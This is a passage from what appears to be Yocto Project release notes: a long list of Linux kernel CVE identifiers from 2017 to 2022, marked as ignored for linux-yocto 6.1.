:cve:`2017-18224`, :cve:`2017-18232`, :cve:`2017-18241`, :cve:`2017-18249`, :cve:`2017-18255`, :cve:`2017-18257`, :cve:`2017-18261`, :cve:`2017-18270`, :cve:`2017-18344`, :cve:`2017-18360`, :cve:`2017-18379`, :cve:`2017-18509`, :cve:`2017-18549`, :cve:`2017-18550`, :cve:`2017-18551`, :cve:`2017-18552`, :cve:`2017-18595`, :cve:`2017-2583`, :cve:`2017-2584`, :cve:`2017-2596`, :cve:`2017-2618`, :cve:`2017-2634`, :cve:`2017-2636`, :cve:`2017-2647`, :cve:`2017-2671`, :cve:`2017-5123`, :cve:`2017-5546`, :cve:`2017-5547`, :cve:`2017-5548`, :cve:`2017-5549`, :cve:`2017-5550`, :cve:`2017-5551`, :cve:`2017-5576`, :cve:`2017-5577`, :cve:`2017-5669`, :cve:`2017-5715`, :cve:`2017-5753`, :cve:`2017-5754`, :cve:`2017-5897`, :cve:`2017-5967`, :cve:`2017-5970`, :cve:`2017-5972`, :cve:`2017-5986`, :cve:`2017-6001`, :cve:`2017-6074`, :cve:`2017-6214`, :cve:`2017-6345`, :cve:`2017-6346`, :cve:`2017-6347`, :cve:`2017-6348`, :cve:`2017-6353`, :cve:`2017-6874`, :cve:`2017-6951`, :cve:`2017-7184`, :cve:`2017-7187`, :cve:`2017-7261`, :cve:`2017-7273`, :cve:`2017-7277`, :cve:`2017-7294`, :cve:`2017-7308`, :cve:`2017-7346`, :cve:`2017-7374`, :cve:`2017-7472`, :cve:`2017-7477`, :cve:`2017-7482`, :cve:`2017-7487`, :cve:`2017-7495`, :cve:`2017-7518`, :cve:`2017-7533`, :cve:`2017-7541`, :cve:`2017-7542`, :cve:`2017-7558`, :cve:`2017-7616`, :cve:`2017-7618`, :cve:`2017-7645`, :cve:`2017-7889`, :cve:`2017-7895`, :cve:`2017-7979`, :cve:`2017-8061`, :cve:`2017-8062`, :cve:`2017-8063`, :cve:`2017-8064`, :cve:`2017-8065`, :cve:`2017-8066`, :cve:`2017-8067`, :cve:`2017-8068`, :cve:`2017-8069`, :cve:`2017-8070`, :cve:`2017-8071`, :cve:`2017-8072`, :cve:`2017-8106`, :cve:`2017-8240`, :cve:`2017-8797`, :cve:`2017-8824`, :cve:`2017-8831`, :cve:`2017-8890`, :cve:`2017-8924`, :cve:`2017-8925`, :cve:`2017-9059`, :cve:`2017-9074`, :cve:`2017-9075`, :cve:`2017-9076`, :cve:`2017-9077`, :cve:`2017-9150`, :cve:`2017-9211`, :cve:`2017-9242`, :cve:`2017-9605`, :cve:`2017-9725`, :cve:`2017-9984`, :cve:`2017-9985`, :cve:`2017-9986`, :cve:`2018-1000004`, :cve:`2018-1000026`, :cve:`2018-1000028`, :cve:`2018-1000199`, :cve:`2018-1000200`, :cve:`2018-1000204`, :cve:`2018-10021`, :cve:`2018-10074`, :cve:`2018-10087`, :cve:`2018-10124`, :cve:`2018-10322`, :cve:`2018-10323`, :cve:`2018-1065`, :cve:`2018-1066`, :cve:`2018-10675`, :cve:`2018-1068`, :cve:`2018-10840`, :cve:`2018-10853`, :cve:`2018-1087`, :cve:`2018-10876`, :cve:`2018-10877`, :cve:`2018-10878`, :cve:`2018-10879`, :cve:`2018-10880`, :cve:`2018-10881`, :cve:`2018-10882`, :cve:`2018-10883`, :cve:`2018-10901`, :cve:`2018-10902`, :cve:`2018-1091`, :cve:`2018-1092`, :cve:`2018-1093`, :cve:`2018-10938`, :cve:`2018-1094`, :cve:`2018-10940`, :cve:`2018-1095`, :cve:`2018-1108`, :cve:`2018-1118`, :cve:`2018-1120`, :cve:`2018-11232`, :cve:`2018-1128`, :cve:`2018-1129`, :cve:`2018-1130`, :cve:`2018-11412`, :cve:`2018-11506`, :cve:`2018-11508`, :cve:`2018-12126`, :cve:`2018-12127`, :cve:`2018-12130`, :cve:`2018-12207`, :cve:`2018-12232`, :cve:`2018-12233`, :cve:`2018-12633`, :cve:`2018-12714`, :cve:`2018-12896`, :cve:`2018-12904`, :cve:`2018-13053`, :cve:`2018-13093`, :cve:`2018-13094`, :cve:`2018-13095`, :cve:`2018-13096`, :cve:`2018-13097`, :cve:`2018-13098`, :cve:`2018-13099`, :cve:`2018-13100`, :cve:`2018-13405`, :cve:`2018-13406`, :cve:`2018-14609`, :cve:`2018-14610`, :cve:`2018-14611`, :cve:`2018-14612`, :cve:`2018-14613`, :cve:`2018-14614`, :cve:`2018-14615`, :cve:`2018-14616`, :cve:`2018-14617`, :cve:`2018-14619`, :cve:`2018-14625`, :cve:`2018-14633`, :cve:`2018-14634`, :cve:`2018-14641`, :cve:`2018-14646`, :cve:`2018-14656`, :cve:`2018-14678`, :cve:`2018-14734`, :cve:`2018-15471`, :cve:`2018-15572`, :cve:`2018-15594`, :cve:`2018-16276`, :cve:`2018-16597`, :cve:`2018-16658`, :cve:`2018-16862`, :cve:`2018-16871`, :cve:`2018-16880`, :cve:`2018-16882`, :cve:`2018-16884`, :cve:`2018-17182`, :cve:`2018-17972`, :cve:`2018-18021`, :cve:`2018-18281`, :cve:`2018-18386`, :cve:`2018-18397`, :cve:`2018-18445`, :cve:`2018-18559`, :cve:`2018-18690`, :cve:`2018-18710`, :cve:`2018-18955`, :cve:`2018-19406`, :cve:`2018-19407`, :cve:`2018-19824`, :cve:`2018-19854`, :cve:`2018-19985`, :cve:`2018-20169`, :cve:`2018-20449`, :cve:`2018-20509`, :cve:`2018-20510`, :cve:`2018-20511`, :cve:`2018-20669`, :cve:`2018-20784`, :cve:`2018-20836`, :cve:`2018-20854`, :cve:`2018-20855`, :cve:`2018-20856`, :cve:`2018-20961`, :cve:`2018-20976`, :cve:`2018-21008`, :cve:`2018-25015`, :cve:`2018-25020`, :cve:`2018-3620`, :cve:`2018-3639`, :cve:`2018-3646`, :cve:`2018-3665`, :cve:`2018-3693`, :cve:`2018-5332`, :cve:`2018-5333`, :cve:`2018-5344`, :cve:`2018-5390`, :cve:`2018-5391`, :cve:`2018-5703`, :cve:`2018-5750`, :cve:`2018-5803`, :cve:`2018-5814`, :cve:`2018-5848`, :cve:`2018-5873`, :cve:`2018-5953`, :cve:`2018-5995`, :cve:`2018-6412`, :cve:`2018-6554`, :cve:`2018-6555`, :cve:`2018-6927`, :cve:`2018-7191`, :cve:`2018-7273`, :cve:`2018-7480`, :cve:`2018-7492`, :cve:`2018-7566`, :cve:`2018-7740`, :cve:`2018-7754`, :cve:`2018-7755`, :cve:`2018-7757`, :cve:`2018-7995`, :cve:`2018-8043`, :cve_mitre:`2018-8087`, :cve_mitre:`2018-8781`, :cve_mitre:`2018-8822`, :cve_mitre:`2018-8897`, :cve_mitre:`2018-9363`, :cve_mitre:`2018-9385`, :cve_mitre:`2018-9415`, :cve_mitre:`2018-9422`, :cve_mitre:`2018-9465`, :cve_mitre:`2018-9516`, :cve_mitre:`2018-9517`, :cve_mitre:`2018-9518` and :cve_mitre:`2018-9568` +- linux-yocto/6.1 (Continued): Ignore :cve:`2019-0136`, :cve:`2019-0145`, :cve:`2019-0146`, :cve:`2019-0147`, :cve:`2019-0148`, :cve:`2019-0149`, :cve:`2019-0154`, :cve:`2019-0155`, :cve:`2019-10124`, :cve:`2019-10125`, :cve:`2019-10126`, :cve:`2019-10142`, :cve:`2019-10207`, :cve:`2019-10220`, :cve:`2019-10638`, :cve:`2019-10639`, :cve:`2019-11085`, :cve:`2019-11091`, :cve:`2019-11135`, :cve:`2019-11190`, :cve:`2019-11191`, :cve:`2019-1125`, :cve:`2019-11477`, :cve:`2019-11478`, :cve:`2019-11479`, :cve:`2019-11486`, :cve:`2019-11487`, :cve:`2019-11599`, :cve:`2019-11683`, :cve:`2019-11810`, :cve:`2019-11811`, :cve:`2019-11815`, :cve:`2019-11833`, :cve:`2019-11884`, :cve:`2019-12378`, :cve:`2019-12379`, :cve:`2019-12380`, :cve:`2019-12381`, :cve:`2019-12382`, :cve:`2019-12454`, :cve:`2019-12455`, :cve:`2019-12614`, :cve:`2019-12615`, :cve:`2019-12817`, :cve:`2019-12818`, :cve:`2019-12819`, :cve:`2019-12881`, :cve:`2019-12984`, :cve:`2019-13233`, :cve:`2019-13272`, :cve:`2019-13631`, :cve:`2019-13648`, :cve:`2019-14283`, :cve:`2019-14284`, :cve:`2019-14615`, :cve:`2019-14763`, :cve:`2019-14814`, :cve:`2019-14815`, :cve:`2019-14816`, :cve:`2019-14821`, :cve:`2019-14835`, :cve:`2019-14895`, :cve:`2019-14896`, :cve:`2019-14897`, :cve:`2019-14901`, :cve:`2019-15030`, :cve:`2019-15031`, :cve:`2019-15090`, :cve:`2019-15098`, :cve:`2019-15099`, :cve:`2019-15117`, :cve:`2019-15118`, :cve:`2019-15211`, :cve:`2019-15212`, :cve:`2019-15213`, :cve:`2019-15214`, :cve:`2019-15215`, :cve:`2019-15216`, :cve:`2019-15217`, :cve:`2019-15218`, :cve:`2019-15219`, :cve:`2019-15220`, :cve:`2019-15221`, :cve:`2019-15222`, :cve:`2019-15223`, :cve:`2019-15291`, :cve:`2019-15292`, :cve:`2019-15504`, :cve:`2019-15505`, :cve:`2019-15538`, :cve:`2019-15666`, :cve:`2019-15794`, :cve:`2019-15807`, :cve:`2019-15916`, :cve:`2019-15917`, :cve:`2019-15918`, :cve:`2019-15919`, :cve:`2019-15920`, :cve:`2019-15921`, :cve:`2019-15922`, :cve:`2019-15923`, :cve:`2019-15924`, :cve:`2019-15925`, :cve:`2019-15926`, :cve:`2019-15927`, :cve:`2019-16229`, :cve:`2019-16230`, :cve:`2019-16231`, :cve:`2019-16232`, :cve:`2019-16233`, :cve:`2019-16234`, :cve:`2019-16413`, :cve:`2019-16714`, :cve:`2019-16746`, :cve:`2019-16921`, :cve:`2019-16994`, :cve:`2019-16995`, :cve:`2019-17052`, :cve:`2019-17053`, :cve:`2019-17054`, :cve:`2019-17055`, :cve:`2019-17056`, :cve:`2019-17075`, :cve:`2019-17133`, :cve:`2019-17351`, :cve:`2019-17666`, :cve:`2019-18198`, :cve:`2019-18282`, :cve:`2019-18660`, :cve:`2019-18675`, :cve:`2019-18683`, :cve:`2019-18786`, :cve:`2019-18805`, :cve:`2019-18806`, :cve:`2019-18807`, :cve:`2019-18808`, :cve:`2019-18809`, :cve:`2019-18810`, :cve:`2019-18811`, :cve:`2019-18812`, :cve:`2019-18813`, :cve:`2019-18814`, :cve:`2019-18885`, :cve:`2019-19036`, :cve:`2019-19037`, :cve:`2019-19039`, :cve:`2019-19043`, :cve:`2019-19044`, :cve:`2019-19045`, :cve:`2019-19046`, :cve:`2019-19047`, :cve:`2019-19048`, :cve:`2019-19049`, :cve:`2019-19050`, :cve:`2019-19051`, :cve:`2019-19052`, :cve:`2019-19053`, :cve:`2019-19054`, :cve:`2019-19055`, :cve:`2019-19056`, :cve:`2019-19057`, :cve:`2019-19058`, :cve:`2019-19059`, :cve:`2019-19060`, :cve:`2019-19061`, :cve:`2019-19062`, :cve:`2019-19063`, :cve:`2019-19064`, :cve:`2019-19065`, :cve:`2019-19066`, :cve:`2019-19067`, :cve:`2019-19068`, :cve:`2019-19069`, :cve:`2019-19070`, :cve:`2019-19071`, :cve:`2019-19072`, :cve:`2019-19073`, :cve:`2019-19074`, :cve:`2019-19075`, :cve:`2019-19076`, :cve:`2019-19077`, :cve:`2019-19078`, :cve:`2019-19079`, :cve:`2019-19080`, :cve:`2019-19081`, :cve:`2019-19082`, :cve:`2019-19083`, :cve:`2019-19227`, :cve:`2019-19241`, :cve:`2019-19252`, :cve:`2019-19318`, :cve:`2019-19319`, :cve:`2019-19332`, :cve:`2019-19338`, :cve:`2019-19377`, :cve:`2019-19447`, :cve:`2019-19448`, :cve:`2019-19449`, :cve:`2019-19462`, :cve:`2019-19523`, :cve:`2019-19524`, :cve:`2019-19525`, :cve:`2019-19526`, :cve:`2019-19527`, :cve:`2019-19528`, :cve:`2019-19529`, :cve:`2019-19530`, :cve:`2019-19531`, :cve:`2019-19532`, :cve:`2019-19533`, :cve:`2019-19534`, :cve:`2019-19535`, :cve:`2019-19536`, :cve:`2019-19537`, :cve:`2019-19543`, :cve:`2019-19602`, :cve:`2019-19767`, :cve:`2019-19768`, :cve:`2019-19769`, :cve:`2019-19770`, :cve:`2019-19807`, :cve:`2019-19813`, :cve:`2019-19815`, :cve:`2019-19816`, :cve:`2019-19922`, :cve:`2019-19927`, :cve:`2019-19947`, :cve:`2019-19965`, :cve:`2019-19966`, :cve:`2019-1999`, :cve:`2019-20054`, :cve:`2019-20095`, :cve:`2019-20096`, :cve:`2019-2024`, :cve:`2019-2025`, :cve:`2019-20422`, :cve:`2019-2054`, :cve:`2019-20636`, :cve:`2019-20806`, :cve:`2019-20810`, :cve:`2019-20811`, :cve:`2019-20812`, :cve:`2019-20908`, :cve:`2019-20934`, :cve:`2019-2101`, :cve:`2019-2181`, :cve:`2019-2182`, :cve:`2019-2213`, :cve:`2019-2214`, :cve:`2019-2215`, :cve:`2019-25044`, :cve:`2019-25045`, :cve:`2019-3016`, :cve:`2019-3459`, :cve:`2019-3460`, :cve:`2019-3701`, :cve:`2019-3819`, :cve:`2019-3837`, :cve:`2019-3846`, :cve:`2019-3874`, :cve:`2019-3882`, :cve:`2019-3887`, :cve:`2019-3892`, :cve:`2019-3896`, :cve:`2019-3900`, :cve:`2019-3901`, :cve:`2019-5108`, :cve:`2019-6133`, :cve:`2019-6974`, :cve:`2019-7221`, :cve:`2019-7222`, :cve:`2019-7308`, :cve:`2019-8912`, :cve:`2019-8956`, :cve:`2019-8980`, :cve:`2019-9003`, :cve:`2019-9162`, :cve:`2019-9213`, :cve:`2019-9245`, :cve:`2019-9444`, :cve:`2019-9445`, :cve:`2019-9453`, :cve:`2019-9454`, :cve:`2019-9455`, :cve:`2019-9456`, :cve:`2019-9457`, :cve:`2019-9458`, :cve:`2019-9466`, :cve:`2019-9500`, :cve:`2019-9503`, :cve:`2019-9506`, :cve:`2019-9857`, :cve:`2020-0009`, :cve:`2020-0030`, :cve:`2020-0041`, :cve:`2020-0066`, :cve:`2020-0067`, :cve:`2020-0110`, :cve:`2020-0255`, :cve:`2020-0305`, :cve:`2020-0404`, :cve:`2020-0423`, :cve:`2020-0427`, :cve:`2020-0429`, :cve:`2020-0430`, :cve:`2020-0431`, :cve:`2020-0432`, :cve:`2020-0433`, :cve:`2020-0435`, :cve:`2020-0444`, :cve:`2020-0465`, :cve:`2020-0466`, :cve:`2020-0543`, :cve:`2020-10135`, :cve:`2020-10690`, :cve:`2020-10711`, :cve:`2020-10720`, :cve:`2020-10732`, :cve:`2020-10742`, :cve:`2020-10751`, :cve:`2020-10757`, :cve:`2020-10766`, :cve:`2020-10767`, :cve:`2020-10768`, :cve:`2020-10769`, :cve:`2020-10773`, :cve:`2020-10781`, :cve:`2020-10942`, :cve:`2020-11494`, :cve:`2020-11565`, :cve:`2020-11608`, :cve:`2020-11609`, :cve:`2020-11668`, :cve:`2020-11669`, :cve:`2020-11884`, :cve:`2020-12114`, :cve:`2020-12351`, :cve:`2020-12352`, :cve:`2020-12362`, :cve:`2020-12363`, :cve:`2020-12364`, :cve:`2020-12464`, :cve:`2020-12465`, :cve:`2020-12652`, :cve:`2020-12653`, :cve:`2020-12654`, :cve:`2020-12655`, :cve:`2020-12656`, :cve:`2020-12657`, :cve:`2020-12659`, :cve:`2020-12768`, :cve:`2020-12769`, :cve:`2020-12770`, :cve:`2020-12771`, :cve:`2020-12826`, :cve:`2020-12888`, :cve:`2020-12912`, :cve:`2020-13143`, :cve:`2020-13974`, :cve:`2020-14305`, :cve:`2020-14314`, :cve:`2020-14331`, :cve:`2020-14351`, :cve:`2020-14353`, :cve:`2020-14356`, :cve:`2020-14381`, :cve:`2020-14385`, :cve:`2020-14386`, :cve:`2020-14390`, :cve:`2020-14416`, :cve:`2020-15393`, :cve:`2020-15436`, :cve:`2020-15437`, :cve:`2020-15780`, :cve:`2020-15852`, :cve:`2020-16119`, :cve:`2020-16120`, :cve:`2020-16166`, :cve:`2020-1749`, :cve:`2020-24394`, :cve:`2020-24490`, :cve:`2020-24504`, :cve:`2020-24586`, :cve:`2020-24587`, :cve:`2020-24588`, :cve:`2020-25211`, :cve:`2020-25212`, :cve:`2020-25221`, :cve:`2020-25284`, :cve:`2020-25285`, :cve:`2020-25639`, :cve:`2020-25641`, :cve:`2020-25643`, :cve:`2020-25645`, :cve:`2020-25656`, :cve:`2020-25668`, :cve:`2020-25669`, :cve:`2020-25670`, :cve:`2020-25671`, :cve:`2020-25672`, :cve:`2020-25673`, :cve:`2020-25704`, :cve:`2020-25705`, :cve:`2020-26088`, :cve:`2020-26139`, :cve:`2020-26141`, :cve:`2020-26145`, :cve:`2020-26147`, :cve:`2020-26541`, :cve:`2020-26555`, :cve:`2020-26558`, :cve:`2020-27066`, :cve:`2020-27067`, :cve:`2020-27068`, :cve:`2020-27152`, :cve:`2020-27170`, :cve:`2020-27171`, :cve:`2020-27194`, :cve:`2020-2732`, :cve:`2020-27673`, :cve:`2020-27675`, :cve:`2020-27777`, :cve:`2020-27784`, :cve:`2020-27786`, :cve:`2020-27815`, :cve:`2020-27820`, :cve:`2020-27825`, :cve:`2020-27830`, :cve:`2020-27835`, :cve:`2020-28097`, :cve:`2020-28374`, :cve:`2020-28588`, :cve:`2020-28915`, :cve:`2020-28941`, :cve:`2020-28974`, :cve:`2020-29368`, :cve:`2020-29369`, :cve:`2020-29370`, :cve:`2020-29371`, :cve:`2020-29372`, :cve:`2020-29373`, :cve:`2020-29374`, :cve:`2020-29534`, :cve:`2020-29568`, :cve:`2020-29569`, :cve:`2020-29660`, :cve:`2020-29661`, :cve:`2020-35499`, :cve:`2020-35508`, :cve:`2020-35513`, :cve:`2020-35519`, :cve:`2020-36158`, :cve:`2020-36310`, :cve:`2020-36311`, :cve:`2020-36312`, :cve:`2020-36313`, :cve:`2020-36322`, :cve:`2020-36385`, :cve:`2020-36386`, :cve:`2020-36387`, :cve:`2020-36516`, :cve:`2020-36557`, :cve:`2020-36558`, :cve:`2020-36691`, :cve:`2020-36694`, :cve:`2020-36766`, :cve:`2020-3702`, :cve:`2020-4788`, :cve:`2020-7053`, :cve:`2020-8428`, :cve:`2020-8647`, :cve:`2020-8648`, :cve:`2020-8649`, :cve:`2020-8694`, :cve:`2020-8834`, :cve:`2020-8835`, :cve:`2020-8992`, :cve:`2020-9383`, :cve:`2020-9391`, :cve:`2021-0129`, :cve:`2021-0342`, :cve_mitre:`2021-0447`, :cve_mitre:`2021-0448`, :cve:`2021-0512`, :cve:`2021-0605`, :cve:`2021-0707`, :cve:`2021-0920`, :cve:`2021-0929`, :cve:`2021-0935`, :cve_mitre:`2021-0937`, :cve:`2021-0938`, :cve:`2021-0941`, :cve:`2021-1048`, :cve:`2021-20177`, :cve:`2021-20194`, :cve:`2021-20226`, :cve:`2021-20239`, :cve:`2021-20261`, :cve:`2021-20265`, :cve:`2021-20268`, :cve:`2021-20292`, :cve:`2021-20317`, :cve:`2021-20320`, :cve:`2021-20321`, :cve:`2021-20322`, :cve:`2021-21781`, :cve:`2021-22543`, :cve:`2021-22555`, :cve:`2021-22600`, :cve:`2021-23133`, :cve:`2021-23134`, :cve:`2021-26401`, :cve:`2021-26708`, :cve:`2021-26930`, :cve:`2021-26931`, :cve:`2021-26932`, :cve:`2021-27363`, :cve:`2021-27364`, :cve:`2021-27365`, :cve:`2021-28038`, :cve:`2021-28039`, :cve:`2021-28375`, :cve:`2021-28660`, :cve:`2021-28688`, :cve:`2021-28691`, :cve:`2021-28711`, :cve:`2021-28712`, :cve:`2021-28713`, :cve:`2021-28714`, :cve:`2021-28715`, :cve:`2021-28950`, :cve:`2021-28951`, :cve:`2021-28952`, :cve:`2021-28964`, :cve:`2021-28971`, :cve:`2021-28972`, :cve:`2021-29154`, :cve:`2021-29155`, :cve:`2021-29264`, :cve:`2021-29265`, :cve:`2021-29266`, :cve:`2021-29646`, :cve:`2021-29647`, :cve:`2021-29648`, :cve:`2021-29649`, :cve:`2021-29650`, :cve:`2021-29657`, :cve:`2021-30002`, :cve:`2021-30178`, :cve:`2021-31440`, :cve:`2021-3178`, :cve:`2021-31829`, :cve:`2021-31916`, :cve:`2021-32078`, :cve:`2021-32399`, :cve:`2021-32606`, :cve:`2021-33033`, :cve:`2021-33034`, :cve:`2021-33061`, :cve:`2021-33098`, :cve:`2021-33135`, :cve:`2021-33200`, :cve:`2021-3347`, :cve:`2021-3348`, :cve:`2021-33624`, :cve:`2021-33655`, :cve:`2021-33656`, :cve:`2021-33909`, :cve:`2021-3411`, :cve:`2021-3428`, :cve:`2021-3444`, :cve:`2021-34556`, :cve:`2021-34693`, :cve:`2021-3483`, :cve:`2021-34866`, :cve:`2021-3489`, :cve:`2021-3490`, :cve:`2021-3491`, :cve:`2021-3493`, :cve_mitre:`2021-34981`, :cve:`2021-3501`, :cve:`2021-35039`, :cve:`2021-3506`, :cve:`2021-3543`, :cve:`2021-35477`, :cve:`2021-3564`, :cve:`2021-3573`, :cve:`2021-3587`, :cve_mitre:`2021-3600`, :cve:`2021-3609`, :cve:`2021-3612`, :cve:`2021-3635`, :cve:`2021-3640`, :cve:`2021-3653`, :cve:`2021-3655`, :cve:`2021-3656`, :cve:`2021-3659`, :cve:`2021-3669`, :cve:`2021-3679`, :cve:`2021-3715`, :cve:`2021-37159`, :cve:`2021-3732`, :cve:`2021-3736`, :cve:`2021-3739`, :cve:`2021-3743`, :cve:`2021-3744`, :cve:`2021-3752`, :cve:`2021-3753`, :cve:`2021-37576`, :cve:`2021-3759`, :cve:`2021-3760`, :cve:`2021-3764`, :cve:`2021-3772`, :cve:`2021-38160`, :cve:`2021-38166`, :cve:`2021-38198`, :cve:`2021-38199`, :cve:`2021-38200`, :cve:`2021-38201`, :cve:`2021-38202`, :cve:`2021-38203`, :cve:`2021-38204`, :cve:`2021-38205`, :cve:`2021-38206`, :cve:`2021-38207`, :cve:`2021-38208`, :cve:`2021-38209`, :cve:`2021-38300`, :cve:`2021-3894`, :cve:`2021-3896`, :cve:`2021-3923`, :cve:`2021-39633`, :cve:`2021-39634`, :cve:`2021-39636`, :cve:`2021-39648`, :cve:`2021-39656`, :cve:`2021-39657`, :cve:`2021-39685`, :cve:`2021-39686`, :cve:`2021-39698`, :cve:`2021-39711`, :cve:`2021-39713`, :cve:`2021-39714`, :cve:`2021-4001`, :cve:`2021-4002`, :cve:`2021-4023`, :cve:`2021-4028`, :cve:`2021-4032`, :cve:`2021-4037`, :cve:`2021-40490`, :cve:`2021-4083`, :cve:`2021-4090`, :cve:`2021-4093`, :cve:`2021-4095`, :cve:`2021-41073`, :cve:`2021-4135`, :cve:`2021-4148`, :cve:`2021-4149`, :cve:`2021-4150`, :cve:`2021-4154`, :cve:`2021-4155`, :cve:`2021-4157`, :cve:`2021-4159`, :cve:`2021-41864`, :cve:`2021-4197`, :cve:`2021-42008`, :cve:`2021-4202`, :cve:`2021-4203`, :cve:`2021-4204`, :cve:`2021-4218`, :cve:`2021-42252`, :cve:`2021-42327`, :cve:`2021-42739`, :cve:`2021-43056`, :cve:`2021-43057`, :cve:`2021-43267`, :cve:`2021-43389`, :cve:`2021-43975`, :cve:`2021-43976`, :cve:`2021-44733`, :cve:`2021-44879`, :cve:`2021-45095`, :cve:`2021-45100`, :cve:`2021-45402`, :cve:`2021-45469`, :cve:`2021-45480`, :cve:`2021-45485`, :cve:`2021-45486`, :cve:`2021-45868`, :cve:`2021-46283`, :cve:`2022-0001`, :cve:`2022-0002`, :cve:`2022-0168`, :cve:`2022-0171`, :cve:`2022-0185`, :cve:`2022-0264`, :cve:`2022-0286`, :cve:`2022-0322`, :cve:`2022-0330`, :cve:`2022-0382`, :cve:`2022-0433`, :cve:`2022-0435`, :cve:`2022-0480`, :cve:`2022-0487`, :cve:`2022-0492`, :cve:`2022-0494`, :cve:`2022-0500`, :cve:`2022-0516`, :cve:`2022-0617`, :cve:`2022-0644`, :cve:`2022-0646`, :cve:`2022-0742`, :cve:`2022-0812`, :cve:`2022-0847`, :cve:`2022-0850`, :cve:`2022-0854`, :cve:`2022-0995`, :cve:`2022-0998`, :cve:`2022-1011`, :cve:`2022-1012`, :cve:`2022-1015`, :cve:`2022-1016`, :cve:`2022-1043`, :cve:`2022-1048`, :cve:`2022-1055`, :cve:`2022-1158`, :cve:`2022-1184`, :cve:`2022-1195`, :cve:`2022-1198`, :cve:`2022-1199`, :cve:`2022-1204`, :cve:`2022-1205`, :cve:`2022-1263`, :cve:`2022-1280`, :cve:`2022-1353`, :cve:`2022-1419`, :cve:`2022-1462`, :cve:`2022-1508`, :cve:`2022-1516`, :cve:`2022-1651`, :cve:`2022-1652`, :cve:`2022-1671`, :cve:`2022-1678`, :cve:`2022-1679`, :cve:`2022-1729`, :cve:`2022-1734`, :cve:`2022-1786`, :cve:`2022-1789`, :cve:`2022-1836`, :cve:`2022-1852`, :cve:`2022-1882`, :cve:`2022-1943`, :cve:`2022-1966`, :cve:`2022-1972`, :cve:`2022-1973`, :cve:`2022-1974`, :cve:`2022-1975`, :cve:`2022-1976`, :cve:`2022-1998`, :cve:`2022-20008`, :cve:`2022-20132`, :cve:`2022-20141`, :cve:`2022-20148`, :cve:`2022-20153`, :cve:`2022-20154`, :cve:`2022-20158`, :cve:`2022-20166`, :cve:`2022-20368`, :cve:`2022-20369`, :cve:`2022-20409`, :cve:`2022-20421`, :cve:`2022-20422`, :cve:`2022-20423`, :cve:`2022-20424`, :cve_mitre:`2022-20565`, :cve:`2022-20566`, :cve:`2022-20567`, :cve:`2022-20568`, :cve:`2022-20572`, :cve:`2022-2078`, :cve:`2022-21123`, :cve:`2022-21125`, :cve:`2022-21166`, :cve:`2022-21385`, :cve:`2022-21499`, :cve_mitre:`2022-21505`, :cve:`2022-2153`, :cve:`2022-2196`, :cve_mitre:`2022-22942`, :cve:`2022-23036`, :cve:`2022-23037`, :cve:`2022-23038`, :cve:`2022-23039`, :cve:`2022-23040`, :cve:`2022-23041`, :cve:`2022-23042`, :cve:`2022-2308`, :cve:`2022-2318`, :cve:`2022-23222`, :cve:`2022-2327`, :cve:`2022-2380`, :cve:`2022-23816`, :cve:`2022-23960`, :cve:`2022-24122`, :cve:`2022-24448`, :cve:`2022-24958`, :cve:`2022-24959`, :cve:`2022-2503`, :cve:`2022-25258`, :cve:`2022-25375`, :cve:`2022-25636`, :cve_mitre:`2022-2585`, :cve_mitre:`2022-2586`, :cve_mitre:`2022-2588`, :cve:`2022-2590`, :cve_mitre:`2022-2602`, :cve:`2022-26365`, :cve:`2022-26373`, :cve:`2022-2639`, :cve:`2022-26490`, :cve:`2022-2663`, :cve:`2022-26966`, :cve:`2022-27223`, :cve:`2022-27666`, :cve:`2022-27672`, :cve:`2022-2785`, :cve:`2022-27950`, :cve:`2022-28356`, :cve:`2022-28388`, :cve:`2022-28389`, :cve:`2022-28390`, :cve:`2022-2873`, :cve:`2022-28796`, :cve:`2022-28893`, :cve:`2022-2905`, :cve:`2022-29156`, :cve:`2022-2938`, :cve:`2022-29581`, :cve:`2022-29582`, :cve:`2022-2959`, :cve:`2022-2964`, :cve:`2022-2977`, :cve:`2022-2978`, :cve:`2022-29900`, :cve:`2022-29901`, :cve:`2022-2991`, :cve:`2022-29968`, :cve:`2022-3028`, :cve:`2022-30594`, :cve:`2022-3061`, :cve:`2022-3077`, :cve:`2022-3078`, :cve:`2022-3103`, :cve:`2022-3104`, :cve:`2022-3105`, :cve:`2022-3106`, :cve:`2022-3107`, :cve:`2022-3108`, :cve:`2022-3110`, :cve:`2022-3111`, :cve:`2022-3112`, :cve:`2022-3113`, :cve:`2022-3114`, :cve:`2022-3115`, :cve:`2022-3169`, :cve:`2022-3170`, :cve:`2022-3176`, :cve:`2022-3202`, :cve:`2022-32250`, :cve:`2022-32296`, :cve:`2022-3239`, :cve:`2022-32981`, :cve:`2022-3303`, :cve:`2022-3344`, :cve:`2022-33740`, :cve:`2022-33741`, :cve:`2022-33742`, :cve:`2022-33743`, :cve:`2022-33744`, :cve:`2022-33981`, :cve:`2022-3424`, :cve:`2022-3435`, :cve:`2022-34494`, :cve:`2022-34495`, :cve:`2022-34918`, :cve:`2022-3521`, :cve:`2022-3522`, :cve:`2022-3524`, :cve:`2022-3526`, :cve:`2022-3531`, :cve:`2022-3532`, :cve:`2022-3534`, :cve:`2022-3535`, :cve:`2022-3541`, :cve:`2022-3542`, :cve:`2022-3543`, :cve:`2022-3545`, :cve:`2022-3564`, :cve:`2022-3565`, :cve:`2022-3577`, :cve:`2022-3586`, :cve:`2022-3594`, :cve:`2022-3595`, :cve:`2022-36123`, :cve:`2022-3619`, :cve:`2022-3621`, :cve:`2022-3623`, :cve:`2022-3624`, :cve:`2022-3625`, :cve:`2022-3628`, :cve:`2022-36280`, :cve:`2022-3629`, :cve:`2022-3630`, :cve:`2022-3633`, :cve:`2022-3635`, :cve:`2022-3636`, :cve:`2022-3640`, :cve:`2022-3643`, :cve:`2022-3646`, :cve:`2022-3649`, :cve:`2022-36879`, :cve:`2022-36946`, :cve:`2022-3707`, :cve:`2022-38457`, :cve:`2022-3903`, :cve:`2022-3910`, :cve:`2022-39188`, :cve:`2022-39189`, :cve:`2022-39190`, :cve:`2022-3977`, :cve:`2022-39842`, :cve:`2022-40133`, :cve:`2022-40307`, :cve:`2022-40476`, :cve:`2022-40768`, :cve:`2022-4095`, :cve:`2022-40982`, :cve:`2022-41218`, :cve:`2022-41222`, :cve:`2022-4127`, :cve:`2022-4128`, :cve:`2022-4129`, :cve:`2022-4139`, :cve:`2022-41674`, :cve:`2022-41849`, :cve:`2022-41850`, :cve:`2022-41858`, :cve:`2022-42328`, :cve:`2022-42329`, :cve:`2022-42432`, :cve:`2022-4269`, :cve:`2022-42703`, :cve:`2022-42719`, :cve:`2022-42720`, 